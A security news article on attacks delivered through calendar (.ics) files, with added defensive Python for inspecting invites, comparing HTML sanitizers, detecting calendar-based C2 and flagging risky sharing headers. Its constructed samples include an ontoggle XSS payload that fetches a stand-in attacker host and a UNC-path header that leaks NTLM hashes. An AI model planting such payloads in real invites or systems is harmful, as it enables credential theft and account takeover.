Hackers Weaponizing Calendar Files as New Attack Vector Bypassing Traditional Email Defenses

In Cybersecurity News - Original News Source is cybersecuritynews.com by Blog Writer

Security researchers are tracking a surge in attacks that use iCalendar (.ics) files as a threat vector that slips past traditional email security defenses. These attacks leverage the trusted, plain-text nature of calendar invitations to deliver credential phishing, malware payloads, and, in at least one documented case, a zero-day exploit.

Over the past year, calendar-based phishing has emerged as the third most common email social engineering vector, with a 59% bypass rate against Secure Email Gateways (SEGs) and affecting hundreds of organizations worldwide through campaigns delivering thousands of malicious invites.

The iCalendar format, standardized under RFC 5545, was designed as a text-based, universally interoperable standard for exchanging calendar and scheduling information across platforms, including Microsoft Outlook, Google Calendar, and Apple Calendar (formerly iCal).

This simplicity, while enabling seamless integration, creates exploitable attack surfaces that security solutions struggle to monitor effectively.

The format consists of structured components beginning with VCALENDAR containers that encapsulate VEVENT entries, each containing properties such as DTSTART, DTEND, SUMMARY, LOCATION, DESCRIPTION, and ATTACH.

Attackers exploit multiple fields within .ics files to embed malicious content. The DESCRIPTION and LOCATION fields can contain clickable URLs that redirect victims to credential phishing pages masquerading as legitimate login portals.

The ATTACH property accepts either a URI reference or inline binary content (declared with ENCODING=BASE64;VALUE=BINARY), so an attacker can embed a malware payload directly within the calendar file itself.

Security researchers at NCC Group demonstrated that files referenced by URI in ATTACH properties are automatically embedded when calendar invites are exported or forwarded, enabling silent data exfiltration from victim systems.

These base64-encoded attachments can carry executables, scripts, or DLLs, and because many gateways never decode the ATTACH property, the payload reaches the client unscanned; whether it then runs depends on the user saving and opening it and on endpoint controls catching it at that point.

The ORGANIZER and ATTENDEE fields enable sophisticated social engineering through sender spoofing, where attackers forge identities of trusted contacts or authority figures to increase legitimacy.

Calendar applications render the ORGANIZER and ATTENDEE values as the sender and participant identities, while SPF, DKIM, and DMARC only authenticate the domain of the transporting email. Because invites are often relayed through legitimate services such as Google Calendar or Microsoft Exchange servers, the message passes all three checks even though the organizer identity inside the .ics is entirely attacker-controlled.
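
The fields described above, as an added worked example that is not part of the original article and not code from any vendor or researcher named here: a minimal RFC 5545 reader that unfolds continuation lines, separates properties from their parameters, pulls URLs out of text properties, decodes inline base64 ATTACH content and sniffs its magic bytes, and compares the ORGANIZER domain against the domain that actually passed email authentication. The sample invite, its hostnames and its addresses are constructed for the demonstration.

```python
import base64
import re

# Constructed sample invite, not a real campaign artifact. It exercises three
# things a scanner that greps raw bytes will miss: a folded line that splits a
# URL across two physical lines, an inline base64 ATTACH whose payload starts
# with a PE header, and an ORGANIZER unrelated to the domain that actually
# passed SPF/DKIM/DMARC. All hosts and addresses are invented.
SAMPLE_ICS = (
    "BEGIN:VCALENDAR\r\n"
    "VERSION:2.0\r\n"
    "PRODID:-//Example Corp//Calendar//EN\r\n"
    "BEGIN:VEVENT\r\n"
    "UID:20250101T120000Z-1@example.com\r\n"
    "DTSTART:20250101T120000Z\r\n"
    "DTEND:20250101T130000Z\r\n"
    "SUMMARY:Quarterly review\r\n"
    "ORGANIZER;CN=Finance Director:mailto:director@trusted-partner.example\r\n"
    "LOCATION:https://login-portal.exa\r\n"
    " mple.net/auth\r\n"
    "DESCRIPTION:Please confirm attendance at https://sso-verify.example.org/\r\n"
    " login?next=calendar before the meeting.\r\n"
    "ATTACH;FMTTYPE=application/octet-stream;ENCODING=BASE64;VALUE=BINARY:"
    + base64.b64encode(b"MZ\x90\x00" + b"\x00" * 28).decode() + "\r\n"
    "ATTACH:https://files.example.org/agenda.pdf\r\n"
    "END:VEVENT\r\n"
    "END:VCALENDAR\r\n"
)

URL_RE = re.compile(r"https?://[^\s<>\"']+")
TEXT_PROPS = {"DESCRIPTION", "LOCATION", "SUMMARY", "COMMENT", "URL"}
MAGIC = {b"MZ": "pe", b"PK": "zip-or-office", b"%PDF": "pdf", b"\x7fELF": "elf"}


def unfold(text):
    """Undo RFC 5545 line folding: a line break followed by one space or tab
    continues the previous content line."""
    lines = []
    for raw in re.split(r"\r?\n", text):
        if raw[:1] in (" ", "\t") and lines:
            lines[-1] += raw[1:]
        elif raw:
            lines.append(raw)
    return lines


def parse_property(line):
    """Split 'NAME;PARAM=v;PARAM="quoted:v":content' into (name, params, content).
    The first colon outside double quotes ends the parameter section, so quoted
    parameter values may contain colons (a quoted ';' is not handled here)."""
    in_quotes, cut = False, len(line)
    for i, ch in enumerate(line):
        if ch == '"':
            in_quotes = not in_quotes
        elif ch == ":" and not in_quotes:
            cut = i
            break
    parts = line[:cut].split(";")
    params = {}
    for p in parts[1:]:
        key, _, val = p.partition("=")
        params[key.upper()] = val.strip('"')
    return parts[0].upper(), params, line[cut + 1:]


def unescape_text(value):
    """Reverse RFC 5545 TEXT escaping of backslash, semicolon, comma and newline."""
    return re.sub(r"\\([\\;,nN])", lambda m: "\n" if m.group(1) in "nN" else m.group(1), value)


def inspect_ics(text):
    """Collect what a gateway should look at: URLs in text properties, URI
    attachments, decoded inline attachments with a magic-byte sniff, organizer."""
    report = {"urls": [], "uri_attachments": [], "inline_attachments": [], "organizer": None}
    for line in unfold(text):
        name, params, value = parse_property(line)
        if name in TEXT_PROPS:
            for url in URL_RE.findall(unescape_text(value)):
                report["urls"].append((name, url.rstrip(".,;)")))
        elif name == "ATTACH":
            inline = params.get("ENCODING", "").upper() == "BASE64" or params.get("VALUE", "").upper() == "BINARY"
            if not inline:
                report["uri_attachments"].append(value)
                continue
            try:
                blob = base64.b64decode(value)
            except ValueError:
                blob = b""  # malformed base64 is itself worth flagging
            kind = next((k for magic, k in MAGIC.items() if blob.startswith(magic)), "unknown")
            report["inline_attachments"].append(
                {"fmttype": params.get("FMTTYPE"), "size": len(blob), "magic": kind})
        elif name == "ORGANIZER":
            report["organizer"] = value.lower().replace("mailto:", "", 1)
    return report


def organizer_matches_sender(report, authenticated_from):
    """SPF/DKIM/DMARC vouch for the From domain of the transporting email, not
    for the ORGANIZER inside the .ics; a mismatch is the signal the gateway
    never sees. authenticated_from must come from Authentication-Results."""
    organizer = report.get("organizer") or ""
    if "@" not in organizer or "@" not in authenticated_from:
        return False
    return organizer.rsplit("@", 1)[1] == authenticated_from.lower().rsplit("@", 1)[1]
```

The folding case is the practical point: a scanner that greps the raw file for https:// sees login-portal.exa and never the full URL. The organizer comparison takes the authenticated From address as an input on purpose, because that value has to come from the gateway's own Authentication-Results, never from anything inside the .ics.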

Why Traditional Security Defenses Fail Against Calendar Files

Security tooling has historically focused on attachments that execute code or contain macros, treating .ics files as benign text documents that pose minimal risk.

Most email gateways and endpoint filters lack deep inspection capabilities for calendar files, failing to parse BEGIN:VCALENDAR content or examine embedded URLs and base64-encoded data within ATTACH fields.

This creates a critical security gap that attackers actively exploit, with calendar files slipping through filters designed to catch executables, Office documents with macros, and archive files.

The automatic processing mechanisms built into calendar applications compound this vulnerability. In certain configurations, Microsoft Outlook and Google Calendar automatically process .ics attachments and create tentative calendar events even if users never open the originating email or if the email is quarantined by security solutions.

This “invisible click” problem means malicious links become integrated into users’ trusted calendar interfaces, appearing as legitimate business events rather than suspicious emails.

When calendar reminders trigger hours or days later, users perceive them as part of their normal workflow rather than potential security threats, dramatically increasing click-through rates compared to traditional phishing emails.

Research by Cymulate revealed that calendar files with malicious attachments achieved penetration rates of 59% and 68% against SEGs, significantly higher than most other attack vectors.

This effectiveness stems from several factors: .ics files use the MIME type “text/calendar” which security filters classify as low-risk; their plain-text structure makes them appear harmless during automated scanning; and the volume of legitimate calendar invites flowing through enterprise environments makes anomaly detection challenging.

Furthermore, Sublime Security researchers discovered that calendar entries often persist even when email security solutions successfully quarantine the originating message, creating a dual-payload delivery mechanism where both the email and calendar event must be addressed for complete remediation.

This persistence gives attackers two opportunities for successful compromise and extends the attack window beyond the initial email delivery.

Real-World Attack Campaigns and Exploitation in the Wild

Zimbra Zero-Day Exploitation (CVE-2025-27915)

The most sophisticated calendar file exploitation emerged in early 2025 when threat actors weaponized a zero-day vulnerability in Zimbra Collaboration Suite affecting versions 9.0 through 10.1.

Tracked as CVE-2025-27915, this stored cross-site scripting (XSS) flaw stemmed from insufficient sanitization of HTML carried in .ics content; the payload used the ontoggle event of an HTML <details> element to execute arbitrary JavaScript in the user's session when the malicious calendar invitation was opened.

StrikeReady researchers discovered the attacks while monitoring for .ics files larger than 10KB containing embedded JavaScript code. The campaign, detected in January 2025 before Zimbra’s patch release on January 27, targeted Brazilian military organizations through emails spoofing the Libyan Navy’s Office of Protocol.

The malicious .ics files contained 100KB JavaScript payloads obfuscated using base64 encoding, designed to execute within victims’ browser sessions and perform comprehensive data theft operations.

The malware implemented sophisticated evasion techniques, including a 60-second execution delay, a three-day execution gate ensuring it only ran if at least three days had passed since the last execution, and UI element hiding to reduce visual detection clues.

Once activated, the code injected hidden username and password fields to capture credentials from the login form, monitored user activity through mouse and keyboard tracking, and forced a logout after a period of inactivity so that the user would sign in again through the trapped form.

The payload utilized Zimbra’s SOAP API to search folders and retrieve emails, exfiltrating content to the command-and-control domain ffrk.net every four hours.

It established persistence by creating a mail filter named “Correo” that forwarded all messages to attacker-controlled Proton addresses, and collected authentication artifacts, including two-factor authentication scratch codes, trusted device tokens, and app-specific passwords.

CISA added CVE-2025-27915 to its Known Exploited Vulnerabilities catalog following confirmation of active exploitation against government entities. Security researchers noted TTPs similar to those attributed to UNC1151, a Belarusian state-sponsored threat group known for targeting government and military organizations through webmail exploitation.
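
To show the sanitization failure class behind CVE-2025-27915, here is an added example; it is illustrative code, not Zimbra's sanitizer, which this article does not reproduce. A blocklist-style HTML cleaner that strips script tags and a few well-known event attributes sits beside an allowlist cleaner that rejects every on* attribute by prefix and every tag it does not explicitly permit. The payload string is constructed to match the shape the article describes, a details element with an ontoggle handler, and the fetch target in it is invented.

```python
from html import escape
from html.parser import HTMLParser

# Constructed payload in the shape the Zimbra report describes: no <script>, no
# onclick, just a <details> element whose ontoggle handler fires when its open
# state changes (forced here with the open attribute). The fetch target is invented.
PAYLOAD_HTML = (
    "<p>Agenda attached.</p>"
    "<details open ontoggle=\"fetch('https://c2.example/x')\">"
    "<summary>Details</summary>click</details>"
)

# Blocklist used by the weak sanitizer: the handlers everyone remembers.
BLOCKED_EVENTS = {"onclick", "onload", "onerror", "onmouseover"}

# Allowlist used by the strict sanitizer: what a calendar description needs.
ALLOWED_TAGS = {"p", "b", "i", "u", "em", "strong", "br", "ul", "ol", "li", "a", "span", "div"}
ALLOWED_ATTRS = {"a": {"href"}}


class _Rewriter(HTMLParser):
    """Re-emit the input HTML, keeping only tags and attributes the callbacks
    approve. The content of <script> elements is dropped entirely."""

    def __init__(self, keep_tag, keep_attr):
        super().__init__(convert_charrefs=True)
        self.keep_tag, self.keep_attr, self.out, self.skip = keep_tag, keep_attr, [], 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.skip += 1
            return
        if self.skip or not self.keep_tag(tag):
            return
        kept = [(k, v) for k, v in attrs if self.keep_attr(tag, k, v)]
        attr_text = "".join(f' {k}="{escape(v or "", quote=True)}"' for k, v in kept)
        self.out.append(f"<{tag}{attr_text}>")

    def handle_endtag(self, tag):
        if tag == "script":
            self.skip = max(0, self.skip - 1)
        elif not self.skip and self.keep_tag(tag):
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data, quote=False))


def _rewrite(html, keep_tag, keep_attr):
    parser = _Rewriter(keep_tag, keep_attr)
    parser.feed(html)
    parser.close()
    return "".join(parser.out)


def weak_sanitize(html):
    """Blocklist approach: drop <script> and a fixed set of on* attributes.
    Any handler not on the list, such as ontoggle, survives."""
    return _rewrite(html, lambda tag: True, lambda tag, k, v: k.lower() not in BLOCKED_EVENTS)


def strict_sanitize(html):
    """Allowlist approach: unknown tags are dropped (their text is kept), every
    on* attribute is rejected by prefix, and href must be http(s) or mailto."""
    def keep_attr(tag, k, v):
        k = k.lower()
        if k.startswith("on") or k not in ALLOWED_ATTRS.get(tag, set()):
            return False
        if k == "href":
            return (v or "").strip().lower().startswith(("http://", "https://", "mailto:"))
        return True
    return _rewrite(html, lambda tag: tag in ALLOWED_TAGS, keep_attr)


def has_event_handler(html):
    """Hunting check for stored content: does any tag still carry an on* attribute?"""
    found = []

    class Probe(HTMLParser):
        def handle_starttag(self, tag, attrs):
            found.extend(k for k, _ in attrs if k.lower().startswith("on"))

    Probe().feed(html)
    return bool(found)
```

The weak cleaner is not a straw man: every new HTML event name (ontoggle arrived with the details element) extends the list an attacker can pick from, while the allowlist never has to learn new names because it refuses the on prefix outright. The has_event_handler probe is the kind of check that can be run over already-stored calendar descriptions after a fix ships.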

Google Calendar Spoofing Campaign

Check Point researchers identified a massive phishing campaign that leveraged Google Calendar’s trusted infrastructure to deliver over 4,000 spoofed calendar invites to approximately 300 organizations within a four-week period.

Attackers manipulated email headers to make invitations appear as if they were sent via Google Calendar on behalf of known, legitimate individuals, successfully bypassing spam filters by passing DKIM, SPF, and DMARC security checks.

The campaign initially exploited Google Calendar features that linked to Google Forms, but evolved when security products began flagging these invitations, with attackers pivoting to Google Drawings to maintain effectiveness.

The attack chain embedded calendar files (.ics) or links leading to fake support pages disguised as cryptocurrency mining or Bitcoin support sites.

Users who interacted with these invites encountered fake reCAPTCHA verification pages or support buttons that ultimately redirected them to credential phishing pages designed to harvest login credentials, payment details, and personal information.

With the stolen data, the financially motivated operators could commit credit card fraud, make unauthorized transactions, and bypass security measures across multiple accounts.

Cofense researchers documented a related campaign where attackers exploited .ics calendar invites sent from compromised school district email accounts, containing links to documents hosted on Microsoft SharePoint that led to Wells Fargo phishing pages requesting sensitive banking information, including login credentials, PINs, and account numbers.

Google Threat Intelligence Group discovered in late October 2024 that Chinese state-sponsored threat actor APT41 deployed malware hosted on a compromised government website to target multiple government entities using an innovative command-and-control mechanism through Google Calendar.

The campaign delivered spear-phishing emails containing links to ZIP archives that included a Windows shortcut (LNK) file disguised as a PDF document alongside seven image files, two of which were actually encrypted malware payloads.

When victims executed the LNK file, it displayed a decoy PDF claiming that the listed species required an export declaration while silently initiating a three-stage infection chain.

The PLUSDROP component decrypted the malicious payload using XOR-based routines and executed it via Rundll32.exe; PLUSINJECT employed process hollowing to inject code into legitimate svchost.exe processes for evasion; and TOUGHPROGRESS established the primary backdoor with Google Calendar C2 capabilities.

The malware’s distinctive feature was its abuse of Google Calendar for command-and-control operations, creating zero-minute events at hard-coded dates (May 30, 2023) with encrypted exfiltrated data embedded in event descriptions.

Attackers placed encrypted commands in Calendar events dated July 30 and 31, 2023, which the malware polled, decrypted, and executed on compromised Windows hosts before writing results back to new Calendar events for attacker retrieval.

This technique allowed APT41 to blend malicious C2 traffic with legitimate cloud service activity, evading traditional network-based detection mechanisms.
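
As an added example, not drawn from Google's report: a small heuristic detector over calendar events in the shape of Google Calendar API resources, flagging the combination this section describes, zero-minute events pinned to a hard-coded date well before the event was created and carrying an opaque high-entropy blob as the description. The event records are constructed; the blobs are base64 of hash output standing in for encrypted C2 data.

```python
import base64
import hashlib
import math
import re
from datetime import datetime


def _opaque(seed):
    """Constructed stand-in for an encrypted command or result blob."""
    return base64.b64encode(b"".join(hashlib.sha256(bytes([seed, i])).digest() for i in range(6))).decode()


# Constructed event records in the shape of Google Calendar API resources
# (id, summary, description, start/end dateTime, created). Not real APT41
# artifacts: two ordinary events and two mimicking the described tradecraft.
SAMPLE_EVENTS = [
    {"id": "evt-weekly-sync", "summary": "Weekly sync",
     "description": "Agenda: roadmap review, hiring update, open questions.",
     "start": {"dateTime": "2024-11-04T10:00:00Z"}, "end": {"dateTime": "2024-11-04T11:00:00Z"},
     "created": "2024-10-30T08:12:00Z"},
    {"id": "evt-timesheet", "summary": "Submit timesheet", "description": "Before 17:00.",
     "start": {"dateTime": "2024-11-05T09:00:00Z"}, "end": {"dateTime": "2024-11-05T09:00:00Z"},
     "created": "2024-11-01T07:00:00Z"},
    {"id": "evt-c2-result", "summary": "", "description": _opaque(1),
     "start": {"dateTime": "2023-05-30T00:00:00Z"}, "end": {"dateTime": "2023-05-30T00:00:00Z"},
     "created": "2024-10-28T14:03:11Z"},
    {"id": "evt-c2-command", "summary": "", "description": _opaque(2),
     "start": {"dateTime": "2023-07-30T00:00:00Z"}, "end": {"dateTime": "2023-07-30T00:00:00Z"},
     "created": "2024-10-28T14:05:40Z"},
]

B64_BLOB_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def shannon_entropy(s):
    """Bits per character: English prose sits near 4, base64 of ciphertext near 6."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in (s.count(ch) for ch in set(s)))


def _ts(s):
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def event_indicators(ev):
    """Heuristics tuned to the described tradecraft. Returns the indicators that fired."""
    reasons = []
    start, end, created = _ts(ev["start"]["dateTime"]), _ts(ev["end"]["dateTime"]), _ts(ev["created"])
    desc = (ev.get("description") or "").strip()
    if start == end:
        reasons.append("zero-minute duration")
    if (created - start).days > 180:
        reasons.append("dated long before creation")
    if len(desc) >= 64 and B64_BLOB_RE.match(desc) and shannon_entropy(desc) > 5.0:
        reasons.append("opaque high-entropy description")
    return reasons


def find_suspicious(events, min_indicators=2):
    """Flag events where at least min_indicators heuristics fire; a lone
    zero-minute reminder or a lone stale date is normal calendar use."""
    flagged = []
    for ev in events:
        reasons = event_indicators(ev)
        if len(reasons) >= min_indicators:
            flagged.append((ev["id"], reasons))
    return flagged
```

Requiring two indicators keeps ordinary zero-minute reminders and back-dated notes out of the alert queue; the stale-date check works because the described implant used hard-coded 2023 dates while the events were created during the late-2024 campaign, so in an audit feed the creation timestamp and the event date diverge by more than a year.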

Google implemented custom detection fingerprints to identify and disable malicious calendar instances, terminated attacker-controlled Workspace projects, and added harmful domains to Safe Browsing blocklists.

The campaign demonstrated the convergence of state-sponsored cyber-espionage with cloud service abuse, highlighting how trusted platforms can be weaponized for persistent access and data exfiltration.

Microsoft Outlook DDE Vulnerability Exploitation

Dynamic Data Exchange (DDE) protocol vulnerabilities in Microsoft Outlook created additional attack surfaces for calendar-based exploits prior to security updates.

Researchers discovered that attackers could embed malicious DDE code within calendar invitation bodies, enabling phishing scams without traditional file attachments.

When victims opened these calendar invites, specially crafted DDE fields triggered code execution that could launch arbitrary commands or download malware, though users received two dialog boxes requesting permission before execution occurred.

Security firm SentinelOne demonstrated how easy it was to exploit DDE in calendar invites, showing that attackers could use social engineering to convince users that clicking “Yes” on the prompts was necessary to view the invitation properly.

In December 2023 Microsoft patched CVE-2023-35636, an Outlook information-disclosure flaw disclosed by Varonis that could leak a user's NTLMv2 hash through a crafted calendar-sharing message; a single click on the invitation was enough.

The trigger was a pair of email headers, Content-Class: Sharing and x-sharing-config-url, with the latter pointing at a UNC path on an attacker-controlled SMB server. When the user opened the shared calendar, Outlook fetched the referenced .ics from that server and authenticated with NTLM, handing the attacker a hash that could be cracked offline or relayed to other services. This was an information disclosure, not remote code execution.
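
An added detection check, not from the original article and not Varonis code: parse a message and look for the Content-Class: Sharing header together with an x-sharing-config-url that points at a UNC path, the combination that makes Outlook fetch the .ics over SMB. The sample message, its addresses, and the server IP are constructed.

```python
import re
from email import message_from_string
from email.policy import default

# Constructed message reproducing the header combination Varonis described for
# CVE-2023-35636: Content-Class: Sharing plus an x-sharing-config-url that sends
# Outlook to an SMB share for the .ics. Addresses, host and share are invented.
SAMPLE_MSG = (
    "From: Calendar Team <calendar@trusted-partner.example>\n"
    "To: victim@corp.example\n"
    "Subject: Shared calendar: Q3 planning\n"
    "Content-Class: Sharing\n"
    "x-sharing-config-url: \\\\203.0.113.7\\share\\planning.ics\n"
    "Content-Type: text/plain\n"
    "\n"
    "You have been invited to view a shared calendar. Open this iCal to add it.\n"
)

UNC_RE = re.compile(r"^\\\\([^\\]+)\\")


def sharing_header_risk(raw_message, internal_hosts=()):
    """Classify a message by its calendar-sharing headers.

    high:   sharing invite whose config URL is a UNC path to a host we do not own,
            i.e. Outlook would authenticate with NTLM to an outside server
    low:    UNC path, but to a host listed in internal_hosts
    medium: sharing invite with a non-UNC config URL (review it)
    none:   not a sharing invite, or no config URL at all
    """
    msg = message_from_string(raw_message, policy=default)
    content_class = (msg.get("Content-Class") or "").strip().lower()
    cfg = (msg.get("x-sharing-config-url") or "").strip()
    result = {"is_sharing": content_class == "sharing", "config_url": cfg, "unc_host": None, "risk": "none"}
    if not result["is_sharing"] or not cfg:
        return result
    match = UNC_RE.match(cfg)
    if match:
        result["unc_host"] = match.group(1)
        known = {h.lower() for h in internal_hosts}
        result["risk"] = "low" if match.group(1).lower() in known else "high"
    else:
        result["risk"] = "medium"
    return result
```

At the gateway this rule belongs on external mail only; internal sharing invites legitimately carry these headers. Blocking outbound SMB (TCP 445) at the perimeter removes the NTLM leak path for this and similar UNC-based tricks regardless of the client patch level.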

Microsoft fixed a further Outlook flaw in May 2025, CVE-2025-32705, a remote code execution vulnerability rooted in an out-of-bounds read when Outlook parses specially crafted content.

An out-of-bounds read discloses or misuses memory beyond a buffer's end rather than overwriting it, so turning it into code execution in the context of the logged-in user takes additional work from the attacker, and exploitation requires the victim to open the crafted file.

For enterprises that run calendaring and task management through Outlook, the concern is that such a file arrives through the same trusted invitation channel as everything else, so the controls discussed below apply to it as much as to phishing invites.

Detection, Mitigation, and Defensive Strategies

Organizations must treat .ics files as active content requiring the same scrutiny as executables or scripts. Email security solutions should be configured to deeply inspect calendar files for embedded URLs, base64-encoded data, ATTACH fields, and HTML content.

Sublime Security developed specialized ICS phishing functionality that automatically removes malicious calendar invites from calendars during message remediation, addressing the persistence problem where entries remain after email quarantine.

This capability deletes corresponding events from calendars when messages are sent to quarantine, spam, or trash, preventing the dual-payload delivery mechanism.

Calendar client default settings require modification to prevent automatic event creation from external sources. For Google Workspace, administrators should navigate to Apps → Google Workspace → Calendar → Advanced settings and set “Add invitations to my calendar” to either “Invitations from known senders” or “Invitations users have responded to via email”.

In Microsoft 365 environments, the Exchange Online PowerShell cmdlet Set-CalendarProcessing with AutomateProcessing set to None disables the Calendar Attendant's automatic processing of invites for the targeted mailbox. Administrators can also create mail flow rules that quarantine messages carrying .ics attachments from external senders, and Group Policy should disable the automatic preview pane.

Microsoft Teams calendar invites present similar risks, with attackers weaponizing invites to deliver malicious content directly onto calendars even when Microsoft Defender quarantines the original email.

Organizations should disable anonymous meeting join where possible (the AllowAnonymousUsersToJoinMeeting setting of Set-CsTeamsMeetingPolicy), use Teams meeting policies to restrict auto-join behavior and external invites, and leverage the brand impersonation protection and phishing alerts being rolled out for Teams.

The weaponization of calendar files represents a significant evolution in cyber threat tactics that exploits fundamental trust assumptions built into enterprise collaboration platforms.

With a 59% bypass rate against traditional Secure Email Gateways and campaigns affecting hundreds of organizations globally, .ics file attacks demand immediate defensive attention from security teams.

The technical sophistication demonstrated in zero-day exploits like Zimbra CVE-2025-27915, combined with state-sponsored groups like APT41 innovating C2 mechanisms through Google Calendar, illustrates how attackers continuously adapt to security improvements.

Organizations must recognize that calendar invitations can no longer be treated as benign scheduling communications but rather as potential attack vectors requiring rigorous security controls. The convergence of automatic processing mechanisms, social engineering effectiveness, and security tool blind spots creates ideal conditions for attacker success.

Comprehensive defense requires a layered approach: technical controls such as content disarm and reconstruction (CDR) and deep inspection of calendar attachments, configuration hardening to disable automatic event creation, behavioral monitoring for anomalous calendar activity, and sustained user awareness training that emphasizes verifying unexpected invitations out of band.

As threat actors continue refining calendar-based attack techniques and expanding their integration with broader compromise campaigns, the security community must prioritize this vector in threat modeling and defense architecture planning.
